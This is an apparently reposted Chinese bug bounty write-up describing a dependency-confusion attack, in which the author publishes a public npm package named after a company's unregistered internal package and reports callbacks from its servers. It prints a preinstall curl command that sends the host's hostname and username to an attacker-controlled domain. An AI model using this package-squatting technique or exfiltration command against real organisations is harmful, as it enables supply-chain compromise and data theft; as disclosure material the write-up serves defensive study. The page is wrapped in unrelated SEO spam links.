当前位置: 首页 > news >正文

学电子商务后悔了seo运营培训

学电子商务后悔了,seo运营培训,个人网页设计论文免费,一个公司主体可以在多个网站做备案未经许可,不得转载。 文章目录 正文 依赖混淆是一种供应链攻击漏洞,发生在企业的内部依赖包错误地从公共库(如npm)下载,而不是从其私有注册表下载。攻击者可以在公共注册表中上传一个与公司内部包同名的恶意包&#xf…

未经许可,不得转载。

文章目录

    • 正文

依赖混淆是一种供应链攻击漏洞,发生在企业的内部依赖包错误地从公共库(如npm)下载,而不是从其私有注册表下载。攻击者可以在公共注册表中上传一个与公司内部包同名的恶意包,一旦企业系统从公共源解析并下载该包,恶意代码便可能被执行,进而带来安全风险,如远程代码执行(RCE)。

正文

我发现某企业的前端 JavaScript 文件引用了一个存储在/node_modules/@confidential-package-name的Node.js包。进一步查询后,我发现这个内部包尚未在npm公共注册表中注册。

我创建了一个与内部包同名的恶意npm包,并将其发布到公共npm注册表中。在该包的preinstall脚本中,我嵌入了一个简单的命令,用来在安装时自动执行:

curl — data-urlencode “info=$(hostname && whoami)” http://<attacker-controlled-domain>.oast.fun

这个脚本会将服务器的主机名和用户名发送到我控制的域。

img

包上线后,数小时至几天内就收到了来自该公司的生产环境和非生产环境的多个请求,这说明他们的系统正在下载并执行这个恶意包。

img

在收到超过150个HTTP和DNS查询后,我分析IP地址,排除了已知的爬虫流量,并通过WHOIS查询检哪些请求能够匹配企业IP或其服务提供商的IP。可以看到,我实现了RCE:

img

img

原文出处:https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643

http://www.wooajung.com/news/22116.html

相关文章:

  • 国外网站做任务套利百度推广托管公司
  • 正规的家居行业网站开发他达拉非片
  • 做3d人物模型素材下载网站深圳推广平台深圳网络推广
  • js图片展示网站怎么才能创建一个网站
  • 北海做网站公司引流平台有哪些
  • 企业如何实现高端网站建设哪个平台推广效果好
  • 做网站的主营业务seo网站推广经理招聘
  • 网站设计如何做网络推广营销软件
  • 网站备案模板吉林刷关键词排名优化软件
  • 祖传做网站百度官方网站网址
  • 网站维护总结关键词com
  • 做网站最多的行业河源今日头条新闻最新
  • WordPress的站内地图东莞seo建站
  • 电商怎么开始做长沙seo网站排名
  • 做网站的基础架构网络推广工作好做不
  • 学做粤菜的网站谷歌优化师
  • 电暖怎么做网站seo团队管理系统
  • 网站做政务爱站网关键词搜索
  • 外贸b2c网站诊断优化营商环境条例解读
  • 福田做棋牌网站建设哪家公司便宜网络推广平台收费不便宜
  • 文化传媒主播公司 东莞网站建设免费推广网站入口
  • 做动图网站中央今日头条新闻
  • 无锡微信网站建设价格学历提升
  • 广州自助建站服务热线软件培训机构有哪些?哪个比较好
  • 常州网站建设 光龙关联词有哪些五年级
  • 营销型网站建设市场东莞整站优化推广公司找火速
  • 去哪里学习建设网站网络工程师培训一般多少钱
  • 四川建站网站为什么要seo
  • iis7 网站用户权限企业网站营销的优缺点及案例
  • 天水嘉通建设集团网站长沙网络营销公司